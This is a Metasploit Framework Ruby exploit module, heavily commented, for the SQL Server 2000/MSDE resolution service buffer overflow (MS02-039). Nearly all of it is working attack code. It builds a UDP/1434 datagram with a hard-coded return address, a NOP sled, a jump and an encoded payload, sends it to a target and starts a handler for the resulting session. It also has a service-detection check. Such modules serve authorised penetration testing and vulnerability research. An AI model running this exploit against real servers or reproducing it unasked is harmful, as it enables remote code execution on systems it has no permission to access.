##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
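class Metasploit3 < Msf::Exploit::Remote
  # Exploit module for the SQL Server 2000 / MSDE resolution service stack
  # overflow (MS02-039, CVE-2002-0649).  A single UDP datagram to port 1434
  # that starts with 0x04 and carries an over-long string ending in ":<number>"
  # triggers the overflow; #exploit builds that datagram with a hard-coded
  # jump-to-stack address followed by the payload.  Only pre-SP3 installs are
  # affected (see the module Description and the single target below).
  Rank = GoodRanking

  # Supplies mssql_ping (the resolution-service query used by #check) and the
  # connect_udp / udp_sock / disconnect_udp helpers used by #exploit.
  include Msf::Exploit::Remote::MSSQL

  # Registers module metadata, payload constraints, the single target and the
  # RPORT default.
  #
  # @param info [Hash] additional module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft SQL Server Resolution Overflow',
      'Description'    => %q{
          This is an exploit for the SQL Server 2000 resolution
        service buffer overflow. This overflow is triggered by
        sending a udp packet to port 1434 which starts with 0x04 and
        is followed by long string terminating with a colon and a
        number. This module should work against any vulnerable SQL
        Server 2000 or MSDE install (pre-SP3).
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2002-0649'],
          [ 'OSVDB', '4578'],
          [ 'BID', '5310'],
          [ 'MSB', 'MS02-039'],
        ],
      # The module declares that the resulting session runs with the
      # privileges of the SQL Server service process.
      'Privileged'     => true,
      'Payload'        =>
        {
          # The payload is written at offset 117 of an 806-byte buffer whose
          # last five bytes are the ":888" terminator; 117 + 512 = 629 keeps
          # the largest payload inside the 800-byte filler so that terminator
          # is never overwritten (see #exploit).
          'Space'           => 512,
          # NUL, ':', LF, CR, '/' and '\'.  The colon is the overflow string's
          # terminator (see Description), so it must not appear in the payload.
          'BadChars'        => "\x00\x3a\x0a\x0d\x2f\x5c",
          # NOTE(review): presumably a stack-pointer adjustment prepended to the
          # payload so it does not overwrite itself while running; the value is
          # the original author's and is not derived from anything on this page.
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [
            'MSSQL 2000 / MSDE <= SP2',
            {
              'Platform' => 'win',
              # Hard-coded address written at offset 97 in #exploit; per the
              # original comment there it returns into the stack pointer
              # (presumably a jmp/call esp gadget in a fixed-address module).
              # Being version-specific is why there is only one target.
              'Ret'      => 0x42b48774,
            },
          ],
        ],
      'Platform'       => 'win',
      'DisclosureDate' => 'Jul 24 2002',
      'DefaultTarget'  => 0))

    # The resolution service listens on UDP/1434; this overrides whatever
    # RPORT default the MSSQL mixin registers.
    register_options(
      [
        Opt::RPORT(1434)
      ], self.class)
  end

  # Sends the resolution-service ping and prints every field of the reply.
  #
  # The reply is only used to confirm that the service answers; its version
  # field is printed but not compared against the patched (SP3) level, so the
  # result is CheckCode::Detected rather than Vulnerable.
  #
  # @return [Msf::Exploit::CheckCode] Detected when the ping names a server,
  #   Safe otherwise (including when mssql_ping yields nothing)
  def check
    info = mssql_ping
    return Exploit::CheckCode::Safe unless info && info['ServerName']

    print_status("SQL Server Information:")
    info.each_pair do |k, v|
      # ljust never raises for keys longer than the column width, whereas the
      # former `" " * (15 - k.length)` blew up with a negative repeat count.
      print_status(" #{k.ljust(15)} = #{v}")
    end
    Exploit::CheckCode::Detected
  end

  # Builds and sends the single overflow datagram, then waits on the handler.
  #
  # Buffer layout (byte offsets into buf, 806 bytes total):
  #   0         0x04, the leading byte the Description calls out
  #   1..96     random filler
  #   97..100   target.ret (little-endian), the value that takes control
  #   101..106  NOP sled that the stack-pointer return lands on
  #   107..108  short jump over the next 8 bytes
  #   109..116  two pointers the original comment describes as thread
  #             storage writes that avoid a crash
  #   117..     encoded payload (at most 512 bytes, see 'Space')
  #   801..805  "\x68:888" — push imm32 if ever executed, and the ":<number>"
  #             terminator the resolution service expects
  #
  # Nothing is read back from the socket: UDP gives no acknowledgement, so
  # success is only observable through the payload handler.
  #
  # @return [void]
  def exploit
    connect_udp

    print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
    print_status("Execute 'net start sqlserveragent' once access is obtained")

    # \x68:888 => push dword 0x3838383a
    buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"

    # Return to the stack pointer
    buf[ 97, 4] = [target.ret].pack('V')

    # Which lands right here
    buf[101, 6] = make_nops(6)

    # Jumps 8 bytes ahead
    buf[107, 2] = "\xeb\x08"

    # Write to thread storage space to avoid a crash
    buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')

    # And finally into the payload
    buf[117,payload.encoded.length] = payload.encoded

    udp_sock.put(buf)

    disconnect_udp
    handler
  end
end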